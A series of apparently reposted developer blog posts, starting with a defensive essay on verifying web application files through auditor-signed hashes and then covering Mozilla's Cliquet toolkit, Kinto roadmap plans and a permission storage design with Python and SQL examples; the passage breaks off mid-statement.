I’ve been talking with a few folks about this over the past months, and they suggested I publish something to discuss the matter. So here I am!

The problem (Attack vectors)

Let’s try to describe a few potential attacks:

Application Authors just released a new version of their open source web crypto messaging application. An Indie Hoster installs it on their servers so a wide audience can actually use it.

Someone alters the files on the Indie Hoster’s servers, effectively replacing them with altered files that have weaker security properties or a backdoor. This someone could be an Evil Attacker who found their way through, the Indie Hoster itself, or a CDN that delivers the files.

Trusted Certificate Authorities (“governments” or “hacking team”) can also trick the User Agents (i.e. Firefox) into thinking they’re talking to Indie Hoster even though they’re actually talking to a different server.

Altered files are then being served to the User Agents, and Evil Attacker now has a way to actually attack the end users.

Problem Mitigation

Part of the problem is solved by the recently introduced Subresource Integrity (SRI). To quote the specification: “[it] defines a mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation.”

SRI is a good start, but isn’t enough: it ensures the assets (JavaScript files, mainly) loaded from a specific HTML page are the ones the author of the HTML page intends. However, SRI doesn’t allow the User Agent to ensure the HTML page itself is the one it expects.
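
For reference, an SRI integrity value is the name of a hash algorithm followed by the base64-encoded digest of the file. The Python sketch below computes one and builds the matching script tag; the file content and the URL are placeholders.

```python
import base64
import hashlib


def sri_integrity(content, algorithm="sha384"):
    """Return the value to put in the integrity attribute for this content."""
    digest = hashlib.new(algorithm, content).digest()
    return algorithm + "-" + base64.b64encode(digest).decode("ascii")


def script_tag(url, content):
    """Build a script tag that pins the expected content of the file."""
    return '<script src="%s" integrity="%s" crossorigin="anonymous"></script>' % (
        url,
        sri_integrity(content),
    )


# Placeholder asset and URL (assumptions for the example).
asset = b"console.log('crypto messaging app');"
print(script_tag("https://cdn.example.org/app.js", asset))
```

The limitation discussed above is visible here: the integrity value lives inside the HTML page, so whoever can alter the page can alter the value as well.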

In other words, we lack a way to create trust between Application Authors and User Agents. The User Agent currently has to trust the Certificate Authorities and the delivery (Indie Hoster).

For desktop software distribution: Crypto Experts audit the software, sign it somehow and then this signature can be checked locally during installation or runtime. It’s not automated, but at least it’s possible.

For web applications, we don’t have such a mechanism, but it should be possible. Consider the following:

App Authors publish a new version of their software; they provide a hash of each of their distributed files (including the HTML files);
Crypto Experts audit these files and sign the hashes somehow;
User Agents can choose to trust some specific Crypto Experts;
When a User Agent downloads files, it checks if they’re signed by a trusted party.
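The four steps above could be sketched roughly as follows. This is a thought experiment under loud assumptions, not an existing mechanism: the endorsements mapping, the auditor names and the function names are all hypothetical, and the hard part (verifying that an endorsement was really signed by the auditor) is deliberately left out.

```python
import hashlib


def file_hash(content: bytes) -> str:
    """Hex-encoded SHA-256 of a distributed file."""
    return hashlib.sha256(content).hexdigest()


def is_vouched_for(content, endorsements, trusted_auditors):
    """Return True if at least one trusted auditor endorsed this exact file.

    endorsements maps an auditor name to the set of file hashes they audited.
    Checking the auditor's signature on that set is out of scope here.
    """
    digest = file_hash(content)
    return any(digest in endorsements.get(auditor, set())
               for auditor in trusted_auditors)


# Hypothetical data: one auditor endorsed the released index.html.
released = b"<html>app v1.0</html>"
endorsements = {"crypto-expert-a": {file_hash(released)}}
trusted = {"crypto-expert-a"}
```

With this data, is_vouched_for(released, endorsements, trusted) holds, while any altered file, or a User Agent that trusts a different set of auditors, gets a negative answer and could warn the user.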

Choosing who you trust

In terms of user experience, handling certificates is hard, and that’s where the community matters. Distributions such as Tails could choose who they trust to verify the files, and issue warnings or refuse to run the application in case files aren’t verified.

But, as highlighted earlier, CAs are hard to trust. A new instance of the same CA system wouldn’t make much of a difference, except that distributions could ship with a set of trusted authorities (for which revocation would still need to be taken care of).

[…] users are vulnerable to MitM attacks by the authority, which can vouch for, or be coerced to vouch for, false keys. This weakness has been highlighted by recent CA scandals. Both schemes can also be attacked if the authority does not verify keys before vouching for them.

— SoK : Secure Messaging;

It seems that some other systems could allow for something more reliable:

Melara et al proposed CONIKS, using a series of chained commitments to Merkle prefix trees to build a key directory […] for which individual users can efficiently verify the consistency of their own entry in the directory without relying on a third party.

This “self-auditing log” approach makes the system partially have no auditing required (as general auditing of non-equivocation is still required) and also enables the system to be privacy preserving as the entries in the directory need not be made public. This comes at a mild bandwidth cost not reflected in our table, estimated to be about 10 kilobytes per client per day for self-auditing.

— SoK : Secure Messaging;

Now, I honestly have no idea if this thing solves the whole problem, and I’m pretty sure this design has many security problems attached to it.

However, that’s a problem I would really like to see solved one day, so here is the start of the discussion. Don’t hesitate to get in touch!

Addendum

It seems possible to increase the level of trust a user has in a Web Application by adding indicators in the User Agent. For instance, when using an application that’s actually signed by someone considered trustworthy by the User Agent (or the distributor of the User Agent), a little green icon could be presented to the User, so they know that they can be confident about this.

A bit like User-Agents do for SSL, but for the actual signature of the files being viewed.

Service de nuages: Why did we build Cliquet?

2015-07-14T00:00:00+02:00

This article is reposted from “Service de Nuages”, the blog of my team at Mozilla.

tl;dr: Cliquet is a Python toolkit for building APIs, which implements best practices for going to production and for the HTTP protocol.

Origins

The goal for the first quarter of 2015 was to build a service for storing and synchronizing reading lists.

When the project started, we tried to gather all the best practices and recommendations coming from different teams, and above all from the most recently deployed projects.

Likewise, we wanted to take advantage of the robust, battle-tested Firefox Sync protocol for synchronizing “offline” data.

Rather than writing yet another blog post, we chose to gather them in what we called “a protocol”.

Since the planned architecture had us building two projects that both had to follow broadly the same rules, we decided to share the implementation of this protocol and of these best practices in a “toolkit”.

Cliquet was born.

Intentions

Which JSON structure for my API? Which syntax for filtering the list through the querystring? How do I handle concurrent writes? And how do I synchronize data in my client application?

From now on, when a project wants a REST API to store and consume data, it can use the proposed HTTP protocol and focus on what matters. The same goes for clients, where most of the code that interacts with the server is reusable.

How can we check that the service is operational? Which StatsD indicators? Is Sentry properly configured? How do we deploy a new version without breaking client applications?

Since Cliquet provides everything needed to comply with production requirements, going from prototype to operational service is very fast! Out of the box, the service meets expectations in terms of monitoring, configuration, deployment and version deprecation. And if those expectations change, we only need to update the toolkit.

Which storage backend for JSON documents? What if the production team imposes PostgreSQL? And what if we wanted to switch to Redis, or to an in-memory backend to run the tests?

In terms of implementation, we chose to provide abstractions. We had two services whose core consisted of exposing a REST CRUD that persists JSON data in a backend. Since Pyramid and Cornice provide nothing ready-made for that, we wanted to introduce base classes that abstract the notions of REST resource and storage backend.

To make everything optional and “pluggable”, everything is configurable from the application’s .ini file. That way, all projects using the toolkit are deployed the same way: only a few configuration items set them apart.

The protocol

Is it enough to talk about a “REST API”? Do we really need to re-read the HTTP spec every time? Why reinvent a complete protocol every time?

When we develop a Web (micro)service, we generally spend far too much energy (re)making (arbitrary) choices.

No need to list here everything that belongs to the pure HTTP specification, which dictates the format of headers, CORS support, content negotiation (MIME types), the difference between authentication and authorization, the consistency of status codes…

The main choices of the protocol mostly concern:

REST resources: the two URLs of a resource (for the collection and for the records) accept specific verbs and headers.
Formats: the JSON format and structure of responses are imposed, as are list pagination and the syntax for filtering/sorting resources through the querystring.
Timestamps: a revision number that is incremented on every write operation on a collection of records.
Synchronization: a set of levers to fetch and send back changes on the data, without loss or collision, using the timestamps.
Permissions: the rights of a user on a collection or a record (still fresh and about to be documented) [1].
Batch operations: a URL that accepts a series of requests described in JSON and returns the respective responses.
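To give an idea of how the timestamps and synchronization items fit together, here is a small in-memory sketch. It is not Cliquet’s code: the Collection class, the if_match argument and the Conflict exception are hypothetical names, and a plain counter stands in for the revision number.

```python
import itertools


class Conflict(Exception):
    """Raised when a record changed since the client last saw it."""


class Collection:
    def __init__(self):
        self._revisions = itertools.count(1)
        self.timestamp = 0  # revision of the last write on the collection
        self._records = {}

    def put(self, record_id, data, if_match=None):
        """Write a record; if_match is the revision the client last saw."""
        current = self._records.get(record_id)
        if (if_match is not None and current is not None
                and current["last_modified"] != if_match):
            raise Conflict(record_id)
        self.timestamp = next(self._revisions)
        record = dict(data, id=record_id, last_modified=self.timestamp)
        self._records[record_id] = record
        return record

    def changes_since(self, timestamp):
        """Records written after the given revision, oldest first."""
        changed = [r for r in self._records.values()
                   if r["last_modified"] > timestamp]
        return sorted(changed, key=lambda r: r["last_modified"])


bookmarks = Collection()
first = bookmarks.put("a", {"url": "http://example.com"})
bookmarks.put("b", {"url": "http://example.org"})
delta = bookmarks.changes_since(first["last_modified"])
```

A client that remembers the last revision it saw only fetches the delta, and a write based on a stale revision is rejected instead of silently overwriting someone else’s change.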

In the operational dimension of the protocol, we find:

Version management: several versions coexist in production, with alerts in the headers for the end of life of old versions.
Request deferral: headers interpreted by clients, enabled during maintenance or overload, to spare the server.
The error channel: all errors returned by the server share the same JSON format and carry a specific number.
Utilities: miscellaneous URLs that meet the needs expressed by the operations team (monitoring, metadata, public settings).

This protocol is a compilation of best practices for HTTP APIs (that’s our job!), of advice from the system administrators whose job is to provide services to millions of users, and of feedback from the Firefox Sync team on concurrency management and “offline-first”.

It is documented in detail.

In an ideal world, this protocol would be versioned and formalized in an RFC. In our dreams, there would even be several implementations in different languages (Python, Go, Node, etc.). [2]

[1]	See our dedicated article on permissions

[2]	Reminder: we are a very small team!

The toolkit

Technical choices

Cliquet implements the protocol in Python (2.7, 3.4+, pypy), with Pyramid [3].

Pyramid is a Web framework that takes care of the whole HTTP part, and that proves relevant for small projects as well as more ambitious ones.

Cornice is a Pyramid extension, written in part by Alexis and Tarek, that avoids writing all the boilerplate code when building a REST API with Pyramid.

With Cornice, we avoid rewriting every time the code that wires HTTP verbs to methods, validates headers, picks the serializer according to content negotiation headers, returns accurate HTTP codes, handles CORS headers, provides JSON validation from schemas…

Cliquet uses both to implement the protocol and provide abstractions, but Pyramid and Cornice are always at hand to go beyond what is offered!

[3]	At the very beginning we started an implementation with Python-Eve (Flask), but we were not satisfied with its approach to configuring the API, in particular its magic side.

Concepts

Naturally, the concepts of the toolkit mirror those of the protocol, but there are additional elements:

Backends: abstractions for storage, cache and permissions (e.g. PostgreSQL, Redis, in-memory, …)
Monitoring: JSON logging and real-time indicators (StatsD) to track the performance and health of the service.
Configuration: configuration is loaded from environment variables and the .ini file.
Flexibility: most components can be enabled, disabled or substituted from the configuration.
Profiling: development utilities to find bottlenecks.
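The backend and flexibility items can be illustrated with a short sketch of a storage abstraction picked from settings. None of these names come from Cliquet: StorageBase, MemoryStorage, the BACKENDS registry and the storage_backend setting are assumptions made up for the example.

```python
import uuid
from abc import ABC, abstractmethod


class StorageBase(ABC):
    """What a view needs from a storage backend, whatever the database."""

    @abstractmethod
    def create(self, collection_id, user_id, record):
        ...

    @abstractmethod
    def get_all(self, collection_id, user_id):
        ...


class MemoryStorage(StorageBase):
    """In-memory backend, handy for running tests."""

    def __init__(self):
        self._store = {}

    def create(self, collection_id, user_id, record):
        stored = dict(record, id=str(uuid.uuid4()))
        self._store.setdefault((collection_id, user_id), []).append(stored)
        return stored

    def get_all(self, collection_id, user_id):
        return list(self._store.get((collection_id, user_id), []))


# Hypothetical registry: a PostgreSQL or Redis class would be added here.
BACKENDS = {"memory": MemoryStorage}


def load_storage(settings):
    """Instantiate the backend named in the (hypothetical) settings key."""
    return BACKENDS[settings.get("storage_backend", "memory")]()


storage = load_storage({"storage_backend": "memory"})
record = storage.create("bookmarks", "alice", {"url": "http://example.com"})
```

The views only ever talk to the StorageBase interface, so swapping the backend is a matter of changing one setting.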

Proportionally, the implementation of the protocol for REST resources takes up the largest share of the Cliquet source code. However, as described above, Cliquet provides a whole set of tooling and best practices, and therefore remains relevant for any kind of API, even one that doesn’t manipulate data!

The goal of the toolbox is to let a developer build an application simply, confident that it meets production requirements, while being able to replace certain parts as their needs become clearer.

For example, the persistence provided by default is schemaless (e.g. JSONB), but nothing would prevent implementing storage in a relational model.

Since components can be replaced from the configuration, it is entirely possible to extend Cliquet with business notions or exotic technologies! We have laid out a few ideas in the ecosystem documentation.

In the coming weeks, we will introduce the notion of “events” (or signals), which would allow extensions to interface much more cleanly.

We attach great importance to the clarity of the code and the relevance of the patterns, tests and documentation. If you have comments, criticism or questions, don’t hesitate to share them with us!

Cliquet in action

We wrote a getting-started guide, which doesn’t require knowing Pyramid.

To illustrate the simplicity and the concepts, here are a few excerpts!

Step 1

Enable Cliquet:

import cliquet
from pyramid.config import Configurator

def main(global_config, **settings):
    config = Configurator(settings=settings)

    cliquet.initialize(config, '1.0')
    return config.make_wsgi_app()

From there, most of Cliquet’s tools are enabled and accessible.

For example, the hello (/v1/) and monitoring (/v1/__heartbeat__) URLs. But also the storage and cache backends, etc., which can be used in regular Pyramid or Cornice views.

Step 2

Add views:

def main(global_config, **settings):
    config = Configurator(settings=settings)

    cliquet.initialize(config, '1.0')
    config.scan("myproject.views")
    return config.make_wsgi_app()

To define CRUD resources, start by defining a schema with Colander, then declare a resource:

from cliquet import resource, schema

class BookmarkSchema(schema.ResourceSchema):
    url = schema.URL()

@resource.register()
class Bookmark(resource.BaseResource):
    mapping = BookmarkSchema()

From now on, the CRUD resource is available at /v1/bookmarks, with all the synchronization, filtering, sorting, pagination and timestamp features, etc. By default, records are private, per user.

$ http GET "http://localhost:8000/v1/bookmarks"
HTTP/1.1 200 OK
...
{
    "data": [
        {
            "url": "http://cliquet.readthedocs.org",
            "id": "cc103eb5-0c80-40ec-b6f5-dad12e7d975e",
            "last_modified": 1437034418940
        }
    ]
}

Step 3

Of course, it is possible to choose the URLs and the supported HTTP verbs, to modify fields before saving, etc.

@resource.register(collection_path='/user/bookmarks',
                   record_path='/user/bookmarks/{id}',
                   collection_methods=('GET',))
class Bookmark(resource.BaseResource):
    mapping = BookmarkSchema()

    def process_record(self, new, old=None):
        if old is not None and new['device'] != old['device']:
            device = self.request.headers.get('User-Agent')
            new['device'] = device
        return new

More information in the dedicated documentation!

Note

It is possible to define resources without schema validation. See the Kinto source code.

Step 4 (optional)

Use Cliquet’s abstractions in a Cornice view.

For example, a view that uses the storage backend:

from cliquet import Service

score = Service(name="score",
                path='/score/{game}',
                description="Store game score")

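# ScoreSchema is a Colander schema assumed to be defined elsewhere in the project.
@score.post(schema=ScoreSchema)
def post_score(request):
    # Pyramid exposes the URL pattern parameters as request.matchdict.
    collection_id = 'scores-' + request.matchdict['game']
    user_id = request.authenticated_userid
    value = request.validated  # c.f. Cornice.

    storage = request.registry.storage
    record = storage.create(collection_id, user_id, value)
    return record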

Your feedback

Don’t hesitate to send us your feedback! Did this make you want to give it a try? Do you know a similar tool? Are some points unclear? Are concrete use cases missing? Are some aspects poorly thought out? Too constraining? Too much magic? Overkill?

We’ll take it all.

Weak points

We are very proud of what we built in a relatively short time. And as we explained in the previous (more accessible) article, there is potential!

However, we are aware of a number of points that can be seen as weaknesses.

API documentation: currently, we have no solution for a project using Cliquet to easily integrate the full documentation of the resulting API.
Documentation: it is very hard to organize documentation, especially when the target audience ranges from beginners to experienced developers. We are probably victims of the “curse of knowledge”.
The protocol: we can tell that we will have to version the protocol, at least to decouple it from Cliquet versions, if we want to follow the philosophy and the ecosystem all the way through.
Conservatism: we like stability and robustness. But above all, we are not alone and must comply with production constraints! Still, we are very eager to do async with Python 3!
Releasing versions: the flip side of factoring things out. We sometimes prefer to evolve the toolkit (e.g. add an option) for a specific point in a project. As a result, we often have to release projects in cascade.

A few common questions

Why Python?

We really enjoy writing Python, and the schedule initially announced was very tight: stumbling along with a poorly mastered technology was out of the question!

Besides, after spending nearly a year on a Node.js project, the team was keen to get back to Python.

Why not Django?

We considered it, especially because there are several Django REST Framework fans in the team.

We ruled it out mainly in favor of Pyramid’s lightness and modularity.

Why not an asynchronous framework in Python 3+?

For now our system administrators require deployments on Python 2.7, much to our dismay /o\

For Reading List, we had enabled gevent.

Since the approach consists of implementing a well-defined protocol, we don’t rule out writing a Cliquet in aiohttp or Go one day if that proves relevant.

Why not JSON-API?

As we explained when we came back from APIdays, JSON-API is a specification that matches several of our intentions.

When we started the protocol, we didn’t know about JSON-API. For now, since our proposal is much more minimalist, the rapprochement hasn’t gone beyond the discussion stage.

Is Cliquet a REST framework for Pyramid?

No.

Beyond Cliquet’s CRUD resource classes, which implement a very specific protocol, you have to use Cornice or Pyramid directly.

Is Cliquet generic enough for projects outside Mozilla?

First, we make sure everything can be controlled from the .ini configuration, so that components can be enabled, disabled or substituted.

If the HTTP/JSON protocol of the CRUD resources suits you, then Cliquet is probably the shortest path to building a solid application.

But using CRUD resources is optional, so Cliquet remains relevant if the production best practices or the provided abstractions seem worthwhile to you!

Cliquet remains a simple way to get a Pyramid/Cornice application up and running very quickly.

Do JSON resources support complex relational models?

The persistence layer provided is very simple, and should cover most use cases where data has no relations.

However, it is entirely possible to benefit from every aspect of the protocol by using a custom Collection class, which would itself take care of handling relations.

The need for relations could be a good excuse to implement the protocol with Django REST Framework :)

Is it possible to do this or that with Cliquet?

We would like to collect needs in order to write a set of “recipes/tutorials”. But to avoid working in a vacuum, we would like to hear your ideas! (e.g. plugging in GitHub authentication, changing the JSON logging format, storing cartographic data, …)

Can Cliquet handle files?

We are considering it, but for now we are waiting for the need to arise internally before getting started.

If it does, the protocol used will be Remote Storage, notably to fit into the growing ecosystem.

Will feature X be implemented?

Cliquet is already well stocked. Rather than implementing feature X, chances are we will work on making sure the abstractions and extension mechanisms provided allow it to be implemented as an extension.

Service de nuages: Outlook for the summer

2015-07-07T00:00:00+02:00

This article is reposted from “Service de Nuages”, the blog of my team at Mozilla.

Mozilla has a tradition of regularly organizing work weeks where all employees gather physically. For this latest edition, we met our colleagues from all over the world in Whistler, British Columbia, Canada!

It was an opportunity for our team to get together, and above all to share our vision and ideas in the storage field, in order to collect use cases for our solution, Kinto.

In this article, we review the leads we have for the coming months.

Workshops and promotion

Nicolas presented Kinto.js in a dedicated workshop, using the introductory tutorial as presentation material.

The resulting application, simple as it is, gives a good grasp of Kinto’s synchronization concepts. All without any prior installation, since Rémy set up a dev server that is wiped every day.

We made a point of using Vanilla.JS, first to avoid turf wars over frameworks, but also to show that with HTML5 and ES6 we are no longer as helpless as we were a few years ago.

This small workshop made us realize that we still had big gaps in documentation, especially regarding the ecosystem and the overall vision of the projects (Kinto, Kinto.js, Cliquet, …). We will do our best to fill them.

Mozilla Payments

As described previously, we set up a permission system to meet the needs of tracking payments and subscriptions.

For this project, Kinto will be used from a Django application, through a Python client.

Now that the developments have been delivered, we need to follow through: succeed at integration, hosting and scaling up. The solution must be delivered by the end of the year.

Coming up

We would like to take this opportunity to implement a feature that is close to our hearts: building the list of records readable on a shared collection.

Firefox OS and storage

We had many discussions with the Firefox OS team, with whom we had already collaborated on the BrowserID-by-SMS identification server and on Firefox Hello.

In-App sync

Kinto, the simple solution promoted for data synchronization in Firefox OS applications? Sweet! That’s what we’d had in mind for a long time, back in the Daybed days already. So here is a great opportunity to seize!

We will have to spell out the limitations and simplifying assumptions of our solution, especially in terms of concurrency management. We are convinced it fits most needs, but we wouldn’t want to disappoint :)

The fact that Dale, one of the authors of PouchDB, and Michiel de Jong, one of the authors of Remote Storage, encouraged us in our first steps really motivated us!

Cut the Rope

Kinto should be used to synchronize the game’s settings and scores. A nice first exercise and a nice first showcase!

“SyncTo”

Firefox Sync is the solution that synchronizes Firefox data (bookmarks, extensions, history, form completion, passwords, …) between several devices, in an encrypted way.

The implementation of the JavaScript client is relatively complex and is getting a bit old. The existing code isn’t really portable to Firefox OS, and the rewrite attempts did not succeed.

We want to implement a bridge between Kinto and Firefox Sync, so that the simpler and more modern Kinto.js client can be used to fetch the contents and store them in IndexedDB. The delta to implement on the server side is small, because we drew inspiration from the proven Sync protocol. On the client side, it will mostly be a matter of wiring up BrowserID authentication and the crypto.

Alexis jumped at the chance to start writing a Python client for Firefox Sync, which will serve as a building block for writing the service.

Cloud Storage

Eden Chuang and Sean Lee presented progress on integrating remote storage services (DropBox, Baidu Yun) into Firefox OS. Currently, their proof of concept relies on FUSE.

We obviously have in mind introducing the notion of attached files in Kinto, by implementing the Remote Storage specification, but for now the use cases haven’t officially come up.

Coming up

We will probably have to introduce concurrency management in the JS client, complementing what was done on the server, to allow simultaneous writes and background synchronization.

We are also always happy to receive your feedback, and of course your contributions, on both the server and the client code!

Firefox application contents

Today Firefox has a six-week release cycle. One of the goals is to decouple certain application contents from these relatively long cycles (e.g. security rules, dictionaries, translations, …) [1].

These are JSON and binary data that must be versioned and synchronized by browsers (read-only).

Several official tools exist to handle this (Balrog, Shavar, …), and for now no choice has been made. But during conversations with the team in charge of the project, it was really motivating to see that even for this kind of internal need, Kinto is just as relevant!

[1]	The good news is that all the third-party features that were integrated recently will become add-ons again \o/.

Awesome bar

The Firefox Labs team, the laboratory that breeds red pandas in test tubes, is apparently very interested in our solution, notably to feed data to a prototype for improving the Awesome bar, which would merge URL, history and search.

We can’t say much more for now, but Kinto’s collections of records shared between users match perfectly what is envisioned for the future of the browser :)

Coming up

We will therefore probably have to introduce, before the end of the year, indexing and full-text search features (read: ElasticSearch). This is in line with our earlier plans, since it’s something we had in Daybed and that was on our roadmap!

Browser.html

The Research team is exploring platform concepts, and is notably working on implementing a browser in JS/HTML with React: browser.html

Kinto matches the team’s expectations perfectly for synchronizing the data associated with a user.

This could be browsing data (like Sync), but also miscellaneous collections of records, such as browser preferences or an equivalent of the Alexa.com Top 500 to provide URL completion without querying the search engine.

The exercise could be pushed as far as synchronizing React states between devices (for tabs, for example).

Coming up

If browser.html has to store browsing data, encryption features will have to be added to the JS client. That’s convenient: it’s a fascinating topic, and there are several standards!

To avoid polling the server at regular intervals to synchronize changes, introducing push notifications seems fairly natural. This would be the last missing piece for a complete “Mobile/Web backend as a service”.

Conclusion

We are in an ideal situation, since what we had imagined on our roadmap matches what the various teams are asking of us.

The challenge now is to coordinate with everyone, not disappoint, handle the load, keep improving and promoting the product, focus on the next steps and bring a few contributors on board to build a free, generic, simple and self-hostable solution for data storage on the Web :)

Service de nuages: Achievement unlocked

2015-06-01T00:00:00+02:00

This article is reposted from “Service de Nuages”, the blog of my team at Mozilla.

Today is a day of celebration: we have just released Cliquet 2.0 [1] and Kinto 1.0 [2].

The culmination of 3 years of R&D!

—Rémy

Kinto is a service for storing, synchronizing and sharing arbitrary data attached to a Firefox account (but the authentication system is pluggable).

Cliquet is a toolkit that eases the implementation of HTTP microservices, such as REST APIs with synchronization needs.

You can read more about the reasons that led us to propose this new solution, and about our ambition, at http://www.servicedenuages.fr/eco-systeme-et-stockage-generique.html

We are proud of the work we accomplished over the last few months on these two projects. Although most of the work we did for the Reading List server could be reused, many parts were redesigned and we introduced long-awaited features, such as permission management.

Of course, just like after rearranging a living room, we can’t help seeing all the things that still need improving, notably documentation and performance.

We can already glimpse what the ecosystem will look like, and it is promising. There is already a JavaScript client [3] whose goal is to synchronize the browser’s local data with a Kinto instance.

Please don’t hesitate to reach out if you face similar problems: we gladly welcome all kinds of feedback, whether about the code, the documentation, the security of the solution or the way we communicate with the outside world. To contact us, you can leave a comment here or reach us on the #storage channel on Mozilla’s IRC network.

And this is only the beginning! The future is taking shape in our roadmap [4].

[1]	Cliquet is a toolkit that eases the implementation of HTTP microservices, such as REST APIs with synchronization needs.

[2]	Kinto is a service for storing, synchronizing and sharing arbitrary data attached to a Firefox account (but the authentication system is pluggable).

[3]	Cliquetis, the JavaScript library for consuming Kinto’s HTTP API: https://github.com/mozilla-services/cliquetis

[4]	The Kinto roadmap: https://github.com/mozilla-services/kinto/wiki/roadmap

Service de nuages: Storing and querying permissions with Kinto

2015-05-26T00:00:00+02:00

This article is reposted from “Service de Nuages”, the blog of my team at Mozilla.

tl;dr: We now have a great permission system, but how do we store and query these permissions efficiently?

The problem

Now that we have defined a permission model on objects that we are happy with, the problem is to store these permissions efficiently, so that we can allow or deny access to an object for the person making the request.

Every request on our API will generate one or more access checks, so the answer must be very fast or it will hurt the responsiveness of the service.

Obtenir la liste des “principals” d’un utilisateur

Les principals de l’utilisateur correspondent à son user_id ainsi qu’à la liste des identifiants des groupes dans lesquels il a été ajouté.

Pour éviter de recalculer les principals de l’utilisateur à chaque requête, le mieux reste de maintenir une liste des principals par utilisateur.

Ainsi lorsqu’on ajoute un utilisateur à un groupe, il faut bien penser à ajouter le groupe à la liste des principals de l’utilisateur.

Ça se complexifie lorsqu’on ajoute un groupe à un groupe.

Dans un premier temps interdire l’ajout d’un groupe à un groupe est une limitation qu’on est prêts à accepter pour simplifier le modèle.

L’avantage de maintenir la liste des principals d’un utilisateur lors de la modification de cette liste c’est qu’elle est déjà construite lors des lectures, qui sont dans notre cas plus fréquentes que les écritures.

Cela nécessite de donner un identifiant unique aux groupes pour tous les buckets.

Nous proposons de de les nommer avec leur URI: /buckets/blog/groups/moderators
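As a minimal sketch of this write-time bookkeeping, assuming a plain in-memory dictionary as the store (the `user_principals` store and the three function names are hypothetical, not Kinto's API):

```python
from collections import defaultdict

# Hypothetical in-memory store: user id -> set of group URIs.
user_principals = defaultdict(set)


def add_user_to_group(user_id, group_uri):
    """Record the group URI in the user's principals at write time."""
    user_principals[user_id].add(group_uri)


def remove_user_from_group(user_id, group_uri):
    """Drop the group URI; discard() is a no-op if it is absent."""
    user_principals[user_id].discard(group_uri)


def get_user_principals(user_id):
    """Reads need no computation: the user id plus the stored groups."""
    return {user_id} | user_principals[user_id]
```

The cost is paid when group membership changes, so that every permission check only has to read an already built set.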

Getting the list of “principals” of an ACE

As a reminder, an “ACE” is an Access Control Entry, one of the elements of an ACL (e.g. modifying a record).

With the permission system we chose, an object's permissions are inherited from those of its parent object.

For example, having write access on a bucket allows creating permissions and modifying all of its records.

This means that to get the full list of principals holding a permission on an object, we have to look in several places.

Rémy described the inheritance list of each permission in a gist.

Take the example of adding a record to a collection.

The records:create right is granted by any one of the following rights:

bucket:write
collection:write
records:create

Our first idea was to store the permissions on each object and to maintain the exhaustive list of permissions whenever an ACL changed. However, this meant building that list when an object was added and updating the whole tree when it was deleted. (I'll let you imagine the number of operations needed to add an administrator on a bucket containing 1000 collections with 100000 records each.)

The solution we have now adopted is to store the principals of each ACE (who is allowed to perform a given action on the object), to take the union of the inherited ACEs, and to intersect the result with the user's principals:

(ACE(object, permission) ∪ inherited_ACE) ∩ PRINCIPALS(user)

For example, the ACE /buckets/blog/collections/articles:records:create inherits from the ACE /buckets/blog/collections/articles:write and from /buckets/blog:write:

(ACE(/buckets/blog/collections/articles:records:create) ∪ ACE(/buckets/blog/collections/articles:write) ∪ ACE(/buckets/blog:write)) ∩ PRINCIPALS('fxa:alexis')
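The formula above maps directly onto set operations. Here is a small sketch with Python sets; the `ACES` and `PRINCIPALS` dictionaries and their contents are made up for illustration, and `is_allowed` is a hypothetical helper, not part of Kinto:

```python
# Hypothetical in-memory stores; contents are illustrative only.
ACES = {
    "/buckets/blog:write": {"fxa:alexis"},
    "/buckets/blog/collections/articles:write": {"/buckets/blog/groups/moderators"},
    "/buckets/blog/collections/articles:records:create": set(),
}
PRINCIPALS = {
    "fxa:alexis": {"fxa:alexis"},
    "fxa:natim": {"fxa:natim", "/buckets/blog/groups/moderators"},
    "fxa:bob": {"fxa:bob"},
}


def is_allowed(user_id, ace, inherited_aces):
    """True if (ACE ∪ inherited ACEs) ∩ PRINCIPALS(user) is not empty."""
    allowed = set(ACES.get(ace, set()))
    for inherited in inherited_aces:
        allowed |= ACES.get(inherited, set())
    return bool(allowed & PRINCIPALS.get(user_id, set()))


inherited = [
    "/buckets/blog/collections/articles:write",
    "/buckets/blog:write",
]
create = "/buckets/blog/collections/articles:records:create"
print(is_allowed("fxa:alexis", create, inherited))  # granted via the bucket
print(is_allowed("fxa:bob", create, inherited))     # no matching principal
```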

Retrieving the user's data

Things get trickier when we want to restrict the list of records of a collection to those the user can access, because this intersection has to be computed for every record.

A first approach is to check whether the user is mentioned in the ACLs of the bucket or of the collection.

If that is not the case, we then filter the records, keeping those whose principals match the user's:

principals = get_user_principals(user_id)
can_read_all = has_read_perms(bucket_id, collection_id,
                              principals)
if can_read_all:
    records = get_all_records(bucket_id, collection_id,
                              filters=[...])
else:
    records = filter_read_records(bucket_id, collection_id,
                                  principals=principals,
                                  filters=[...])

Something similar will be needed for bulk deletion, when a user tries to delete records on which they have read access but not write access.

The data model

To get an idea of what the queries would look like in an SQL backend, let's see what the data model would be.

The ID format

Using URIs as object identifiers has many advantages (readability, uniqueness, consistency with the URLs).

bucket: /buckets/blog
group: /buckets/blog/groups/moderators
collection: /buckets/blog/collections/articles
record: /buckets/blog/collections/articles/records/02f3f76f-7059-4ae4-888f-2ac9824e9200
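One side effect of this format is that the parent of an object can be derived from its identifier alone. A small sketch, assuming every level follows the /type/id nesting shown above (`parent_uri` is a hypothetical helper):

```python
def parent_uri(uri):
    """Return the URI of the parent object, or None for a bucket.

    Assumes each level of the hierarchy adds exactly two path
    segments: the object type and the object id.
    """
    parts = uri.strip("/").split("/")
    if len(parts) <= 2:  # e.g. ["buckets", "blog"]: a bucket has no parent
        return None
    return "/" + "/".join(parts[:-2])


print(parent_uri("/buckets/blog/collections/articles"))
```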

The tables

For storing principals and permissions:

-- "user" is a reserved word in PostgreSQL, hence the quotes.
CREATE TABLE "user"(id TEXT, principals TEXT[]);
CREATE TABLE perms(ace TEXT, principals TEXT[]);

The perms table associates principals with each ACE (e.g. “/buckets/blog:write”).

For storing the data:

CREATE TABLE object(id TEXT, type TEXT, parent_id TEXT, data JSONB,
                    write_principals TEXT[], read_principals TEXT[]);

The parent_id column tells us which object this one belongs to (e.g. a bucket's group, a bucket's collection, a collection's record, …).

Example users

As described earlier, a user's principals include their own user id.

INSERT INTO "user" (id, principals)
     VALUES ('fxa:alexis', '{"fxa:alexis"}');

INSERT INTO "user" (id, principals)
     VALUES ('fxa:natim',
             '{"fxa:natim", "/buckets/blog/groups/moderators"}');

Example objects

Bucket

INSERT INTO object (id, type, parent_id, data,
                    read_principals, write_principals)
VALUES (
    '/buckets/blog',
    'bucket',
    NULL,
    '{"name": "blog"}'::JSONB,
    '{}', '{"fxa:alexis"}');

Group

INSERT INTO object (id, type, parent_id, data,
                    read_principals, write_principals)
VALUES (
